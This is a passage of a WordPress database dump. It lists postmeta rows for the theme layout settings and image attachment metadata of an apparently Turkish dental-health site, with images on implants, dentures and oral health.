(2993, 6254, 'us_titlebar_bg_size', ''),
(2994, 6254, 'us_titlebar_bg_repeat', ''),
(2995, 6254, 'us_titlebar_bg_position', ''),
(2996, 6254, 'us_titlebar_bg_parallax', ''),
(2997, 6254, 'us_titlebar_overlay_color', ''),
(2998, 6254, 'us_sidebar', ''),
(2999, 6254, 'us_sidebar_id', 'default_sidebar'),
(3000, 6254, 'us_sidebar_pos', 'right'),
(3001, 6254, 'us_footer', ''),
(3002, 6254, 'us_footer_id', 'site-footer'),
(3003, 6257, 'us_og_image', ''),
(3004, 6257, 'us_grid_layout_ids', ''),
(3005, 6257, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3006, 6257, '_edit_last', '1'),
(3007, 6257, '_edit_lock', '1531477412:1'),
(3008, 6258, '_wp_attached_file', '2018/07/implant.jpg'),
(3009, 6258, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:19:\"2018/07/implant.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"implant-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"implant-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:19:\"implant-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:19:\"implant-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:19:\"implant-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:19:\"implant-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3010, 6257, '_thumbnail_id', '6258'),
(3012, 6257, 'slide_template', 'default'),
(3013, 6257, '_wpb_vc_js_status', 'true'),
(3014, 6257, 'us_post_preview_layout', ''),
(3015, 6257, 'us_header', ''),
(3016, 6257, 'us_header_id', ''),
(3017, 6257, 'us_header_sticky_override', '0'),
(3018, 6257, 'us_header_transparent_override', '0'),
(3019, 6257, 'us_header_shadow', '0'),
(3020, 6257, 'us_header_sticky_pos', ''),
(3021, 6257, 'us_titlebar', ''),
(3022, 6257, 'us_titlebar_subtitle', ''),
(3023, 6257, 'us_titlebar_size', ''),
(3024, 6257, 'us_titlebar_color', ''),
(3025, 6257, 'us_titlebar_breadcrumbs', ''),
(3026, 6257, 'us_titlebar_image', ''),
(3027, 6257, 'us_titlebar_bg_size', ''),
(3028, 6257, 'us_titlebar_bg_repeat', ''),
(3029, 6257, 'us_titlebar_bg_position', ''),
(3030, 6257, 'us_titlebar_bg_parallax', ''),
(3031, 6257, 'us_titlebar_overlay_color', ''),
(3032, 6257, 'us_sidebar', ''),
(3033, 6257, 'us_sidebar_id', 'default_sidebar'),
(3034, 6257, 'us_sidebar_pos', 'right'),
(3035, 6257, 'us_footer', ''),
(3036, 6257, 'us_footer_id', 'default-footer'),
(3037, 6260, 'us_og_image', ''),
(3038, 6260, 'us_grid_layout_ids', ''),
(3039, 6260, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3040, 6260, '_edit_last', '1'),
(3041, 6260, '_edit_lock', '1531477624:1'),
(3042, 6261, '_wp_attached_file', '2018/07/protez-dis.jpg'),
(3043, 6261, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:22:\"2018/07/protez-dis.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"protez-dis-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"protez-dis-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:22:\"protez-dis-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:22:\"protez-dis-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:22:\"protez-dis-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:22:\"protez-dis-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3044, 6260, '_thumbnail_id', '6261'),
(3046, 6260, 'slide_template', 'default'),
(3047, 6260, '_wpb_vc_js_status', 'true'),
(3048, 6260, 'us_post_preview_layout', ''),
(3049, 6260, 'us_header', ''),
(3050, 6260, 'us_header_id', ''),
(3051, 6260, 'us_header_sticky_override', '0'),
(3052, 6260, 'us_header_transparent_override', '0'),
(3053, 6260, 'us_header_shadow', '0'),
(3054, 6260, 'us_header_sticky_pos', ''),
(3055, 6260, 'us_titlebar', ''),
(3056, 6260, 'us_titlebar_subtitle', ''),
(3057, 6260, 'us_titlebar_size', ''),
(3058, 6260, 'us_titlebar_color', ''),
(3059, 6260, 'us_titlebar_breadcrumbs', ''),
(3060, 6260, 'us_titlebar_image', ''),
(3061, 6260, 'us_titlebar_bg_size', ''),
(3062, 6260, 'us_titlebar_bg_repeat', ''),
(3063, 6260, 'us_titlebar_bg_position', ''),
(3064, 6260, 'us_titlebar_bg_parallax', ''),
(3065, 6260, 'us_titlebar_overlay_color', ''),
(3066, 6260, 'us_sidebar', ''),
(3067, 6260, 'us_sidebar_id', 'default_sidebar'),
(3068, 6260, 'us_sidebar_pos', 'right'),
(3069, 6260, 'us_footer', ''),
(3070, 6260, 'us_footer_id', 'default-footer'),
(3071, 6263, 'us_og_image', ''),
(3072, 6263, 'us_grid_layout_ids', ''),
(3073, 6263, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3074, 6263, '_edit_last', '1'),
(3075, 6263, '_edit_lock', '1531477810:1'),
(3076, 6264, '_wp_attached_file', '2018/07/dis-saglibi-beslenme.jpg'),
(3077, 6264, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:32:\"2018/07/dis-saglibi-beslenme.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"dis-saglibi-beslenme-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"dis-saglibi-beslenme-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:32:\"dis-saglibi-beslenme-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:32:\"dis-saglibi-beslenme-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:32:\"dis-saglibi-beslenme-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:32:\"dis-saglibi-beslenme-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3078, 6263, '_thumbnail_id', '6264'),
(3080, 6263, 'slide_template', 'default'),
(3081, 6263, '_wpb_vc_js_status', 'true'),
(3082, 6263, 'us_post_preview_layout', ''),
(3083, 6263, 'us_header', ''),
(3084, 6263, 'us_header_id', ''),
(3085, 6263, 'us_header_sticky_override', '0'),
(3086, 6263, 'us_header_transparent_override', '0'),
(3087, 6263, 'us_header_shadow', '0'),
(3088, 6263, 'us_header_sticky_pos', ''),
(3089, 6263, 'us_titlebar', ''),
(3090, 6263, 'us_titlebar_subtitle', ''),
(3091, 6263, 'us_titlebar_size', ''),
(3092, 6263, 'us_titlebar_color', ''),
(3093, 6263, 'us_titlebar_breadcrumbs', ''),
(3094, 6263, 'us_titlebar_image', ''),
(3095, 6263, 'us_titlebar_bg_size', ''),
(3096, 6263, 'us_titlebar_bg_repeat', ''),
(3097, 6263, 'us_titlebar_bg_position', ''),
(3098, 6263, 'us_titlebar_bg_parallax', ''),
(3099, 6263, 'us_titlebar_overlay_color', ''),
(3100, 6263, 'us_sidebar', ''),
(3101, 6263, 'us_sidebar_id', 'default_sidebar'),
(3102, 6263, 'us_sidebar_pos', 'right'),
(3103, 6263, 'us_footer', ''),
(3104, 6263, 'us_footer_id', 'default-footer'),
(3105, 6266, 'us_og_image', ''),
(3106, 6266, 'us_grid_layout_ids', ''),
(3107, 6266, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3108, 6266, '_edit_last', '1'),
(3109, 6266, '_edit_lock', '1531478026:1'),
(3110, 6267, '_wp_attached_file', '2018/07/agiz-yaralari.jpg'),
(3111, 6267, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:25:\"2018/07/agiz-yaralari.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"agiz-yaralari-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"agiz-yaralari-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:25:\"agiz-yaralari-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:25:\"agiz-yaralari-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:25:\"agiz-yaralari-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:25:\"agiz-yaralari-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3112, 6266, '_thumbnail_id', '6267'),
(3114, 6266, 'slide_template', 'default'),
(3115, 6266, '_wpb_vc_js_status', 'true'),
(3116, 6266, 'us_post_preview_layout', ''),
(3117, 6266, 'us_header', ''),
(3118, 6266, 'us_header_id', ''),
(3119, 6266, 'us_header_sticky_override', '0'),
(3120, 6266, 'us_header_transparent_override', '0'),
(3121, 6266, 'us_header_shadow', '0'),
(3122, 6266, 'us_header_sticky_pos', ''),
(3123, 6266, 'us_titlebar', ''),
(3124, 6266, 'us_titlebar_subtitle', ''),
(3125, 6266, 'us_titlebar_size', ''),
(3126, 6266, 'us_titlebar_color', ''),
(3127, 6266, 'us_titlebar_breadcrumbs', ''),
(3128, 6266, 'us_titlebar_image', ''),
(3129, 6266, 'us_titlebar_bg_size', ''),
(3130, 6266, 'us_titlebar_bg_repeat', ''),
(3131, 6266, 'us_titlebar_bg_position', ''),
(3132, 6266, 'us_titlebar_bg_parallax', ''),
(3133, 6266, 'us_titlebar_overlay_color', ''),
(3134, 6266, 'us_sidebar', ''),
(3135, 6266, 'us_sidebar_id', 'default_sidebar'),
(3136, 6266, 'us_sidebar_pos', 'right'),
(3137, 6266, 'us_footer', ''),
(3138, 6266, 'us_footer_id', 'default-footer'),
(3139, 6269, 'us_og_image', ''),
(3140, 6269, 'us_grid_layout_ids', ''),
(3141, 6269, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3142, 6269, '_edit_last', '1'),
(3143, 6269, '_edit_lock', '1531478216:1'),
(3144, 6270, '_wp_attached_file', '2018/07/yaslilarda-agiz-ve-dis-sagligi.jpg'),
(3145, 6270, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:42:\"2018/07/yaslilarda-agiz-ve-dis-sagligi.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"yaslilarda-agiz-ve-dis-sagligi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"yaslilarda-agiz-ve-dis-sagligi-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:42:\"yaslilarda-agiz-ve-dis-sagligi-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:42:\"yaslilarda-agiz-ve-dis-sagligi-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:42:\"yaslilarda-agiz-ve-dis-sagligi-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:42:\"yaslilarda-agiz-ve-dis-sagligi-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3146, 6269, '_thumbnail_id', '6270'),
(3148, 6269, 'slide_template', 'default'),
(3149, 6269, '_wpb_vc_js_status', 'true'),
(3150, 6269, 'us_post_preview_layout', ''),
(3151, 6269, 'us_header', ''),
(3152, 6269, 'us_header_id', ''),
(3153, 6269, 'us_header_sticky_override', '0'),
(3154, 6269, 'us_header_transparent_override', '0'),
(3155, 6269, 'us_header_shadow', '0'),
(3156, 6269, 'us_header_sticky_pos', ''),
(3157, 6269, 'us_titlebar', ''),
(3158, 6269, 'us_titlebar_subtitle', ''),
(3159, 6269, 'us_titlebar_size', ''),
(3160, 6269, 'us_titlebar_color', ''),
(3161, 6269, 'us_titlebar_breadcrumbs', ''),
(3162, 6269, 'us_titlebar_image', ''),
(3163, 6269, 'us_titlebar_bg_size', ''),
(3164, 6269, 'us_titlebar_bg_repeat', ''),
(3165, 6269, 'us_titlebar_bg_position', ''),
(3166, 6269, 'us_titlebar_bg_parallax', ''),
(3167, 6269, 'us_titlebar_overlay_color', ''),
(3168, 6269, 'us_sidebar', ''),
(3169, 6269, 'us_sidebar_id', 'default_sidebar'),
(3170, 6269, 'us_sidebar_pos', 'right'),
(3171, 6269, 'us_footer', ''),
(3172, 6269, 'us_footer_id', 'default-footer'),
(3173, 6272, 'us_og_image', ''),
(3174, 6272, 'us_grid_layout_ids', ''),
(3175, 6272, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3176, 6272, '_edit_last', '1'),
(3177, 6272, '_edit_lock', '1531478428:1'),
(3178, 6273, '_wp_attached_file', '2018/07/engellilerde-dis-sagligi.jpg'),
(3179, 6273, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:36:\"2018/07/engellilerde-dis-sagligi.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"engellilerde-dis-sagligi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"engellilerde-dis-sagligi-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:36:\"engellilerde-dis-sagligi-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:36:\"engellilerde-dis-sagligi-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:36:\"engellilerde-dis-sagligi-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:36:\"engellilerde-dis-sagligi-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3180, 6272, '_thumbnail_id', '6273'),
(3182, 6272, 'slide_template', 'default'),
(3183, 6272, '_wpb_vc_js_status', 'true'),
(3184, 6272, 'us_post_preview_layout', ''),
(3185, 6272, 'us_header', ''),
(3186, 6272, 'us_header_id', ''),
(3187, 6272, 'us_header_sticky_override', '0'),
(3188, 6272, 'us_header_transparent_override', '0'),
(3189, 6272, 'us_header_shadow', '0'),
(3190, 6272, 'us_header_sticky_pos', ''),
(3191, 6272, 'us_titlebar', ''),
(3192, 6272, 'us_titlebar_subtitle', ''),
(3193, 6272, 'us_titlebar_size', ''),
(3194, 6272, 'us_titlebar_color', ''),
(3195, 6272, 'us_titlebar_breadcrumbs', ''),
(3196, 6272, 'us_titlebar_image', ''),
(3197, 6272, 'us_titlebar_bg_size', ''),
(3198, 6272, 'us_titlebar_bg_repeat', ''),
(3199, 6272, 'us_titlebar_bg_position', ''),
(3200, 6272, 'us_titlebar_bg_parallax', ''),
(3201, 6272, 'us_titlebar_overlay_color', ''),
(3202, 6272, 'us_sidebar', ''),
(3203, 6272, 'us_sidebar_id', 'default_sidebar'),
(3204, 6272, 'us_sidebar_pos', 'right'),
(3205, 6272, 'us_footer', ''),
(3206, 6272, 'us_footer_id', 'default-footer'),
(3207, 6275, 'us_og_image', ''),
(3208, 6275, 'us_grid_layout_ids', ''),
(3209, 6275, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3212, 6277, '_wp_attached_file', '2018/07/diyabetlilerde-agiz-sagligi.jpg'),
(3213, 6277, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:39:\"2018/07/diyabetlilerde-agiz-sagligi.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"diyabetlilerde-agiz-sagligi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"diyabetlilerde-agiz-sagligi-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:39:\"diyabetlilerde-agiz-sagligi-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:39:\"diyabetlilerde-agiz-sagligi-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:39:\"diyabetlilerde-agiz-sagligi-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:39:\"diyabetlilerde-agiz-sagligi-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3214, 6275, '_edit_last', '1'),
(3215, 6275, '_edit_lock', '1531478562:1'),
(3216, 6275, '_thumbnail_id', '6277'),
(3218, 6275, 'slide_template', 'default'),
(3219, 6275, '_wpb_vc_js_status', 'true'),
(3220, 6275, 'us_post_preview_layout', ''),
(3221, 6275, 'us_header', ''),
(3222, 6275, 'us_header_id', ''),
(3223, 6275, 'us_header_sticky_override', '0'),
(3224, 6275, 'us_header_transparent_override', '0'),
(3225, 6275, 'us_header_shadow', '0'),
(3226, 6275, 'us_header_sticky_pos', ''),
(3227, 6275, 'us_titlebar', ''),
(3228, 6275, 'us_titlebar_subtitle', ''),
(3229, 6275, 'us_titlebar_size', ''),
(3230, 6275, 'us_titlebar_color', ''),
(3231, 6275, 'us_titlebar_breadcrumbs', ''),
(3232, 6275, 'us_titlebar_image', ''),
(3233, 6275, 'us_titlebar_bg_size', ''),
(3234, 6275, 'us_titlebar_bg_repeat', ''),
(3235, 6275, 'us_titlebar_bg_position', ''),
(3236, 6275, 'us_titlebar_bg_parallax', ''),
(3237, 6275, 'us_titlebar_overlay_color', ''),
(3238, 6275, 'us_sidebar', ''),
(3239, 6275, 'us_sidebar_id', 'default_sidebar'),
(3240, 6275, 'us_sidebar_pos', 'right'),
(3241, 6275, 'us_footer', ''),
(3242, 6275, 'us_footer_id', 'default-footer'),
(3243, 6279, 'us_og_image', ''),
(3244, 6279, 'us_grid_layout_ids', ''),
(3245, 6279, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3246, 6280, '_wp_attached_file', '2018/07/hamilelikte-agiz-sagligi.jpg'),
(3247, 6280, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:36:\"2018/07/hamilelikte-agiz-sagligi.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"hamilelikte-agiz-sagligi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"hamilelikte-agiz-sagligi-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:36:\"hamilelikte-agiz-sagligi-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:36:\"hamilelikte-agiz-sagligi-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:36:\"hamilelikte-agiz-sagligi-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:36:\"hamilelikte-agiz-sagligi-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3248, 6279, '_edit_last', '1'),
(3249, 6279, '_edit_lock', '1531478810:1'),
(3250, 6279, '_thumbnail_id', '6280'),
(3252, 6279, 'slide_template', 'default'),
(3253, 6279, '_wpb_vc_js_status', 'true'),
(3254, 6279, 'us_post_preview_layout', ''),
(3255, 6279, 'us_header', ''),
(3256, 6279, 'us_header_id', ''),
(3257, 6279, 'us_header_sticky_override', '0'),
(3258, 6279, 'us_header_transparent_override', '0'),
(3259, 6279, 'us_header_shadow', '0'),
(3260, 6279, 'us_header_sticky_pos', ''),
(3261, 6279, 'us_titlebar', ''),
(3262, 6279, 'us_titlebar_subtitle', ''),
(3263, 6279, 'us_titlebar_size', ''),
(3264, 6279, 'us_titlebar_color', ''),
(3265, 6279, 'us_titlebar_breadcrumbs', ''),
(3266, 6279, 'us_titlebar_image', ''),
(3267, 6279, 'us_titlebar_bg_size', ''),
(3268, 6279, 'us_titlebar_bg_repeat', ''),
(3269, 6279, 'us_titlebar_bg_position', ''),
(3270, 6279, 'us_titlebar_bg_parallax', ''),
(3271, 6279, 'us_titlebar_overlay_color', ''),
(3272, 6279, 'us_sidebar', ''),
(3273, 6279, 'us_sidebar_id', 'default_sidebar'),
(3274, 6279, 'us_sidebar_pos', 'right'),
(3275, 6279, 'us_footer', ''),
(3276, 6279, 'us_footer_id', 'default-footer'),
(3277, 6282, 'us_og_image', ''),
(3278, 6282, 'us_grid_layout_ids', ''),
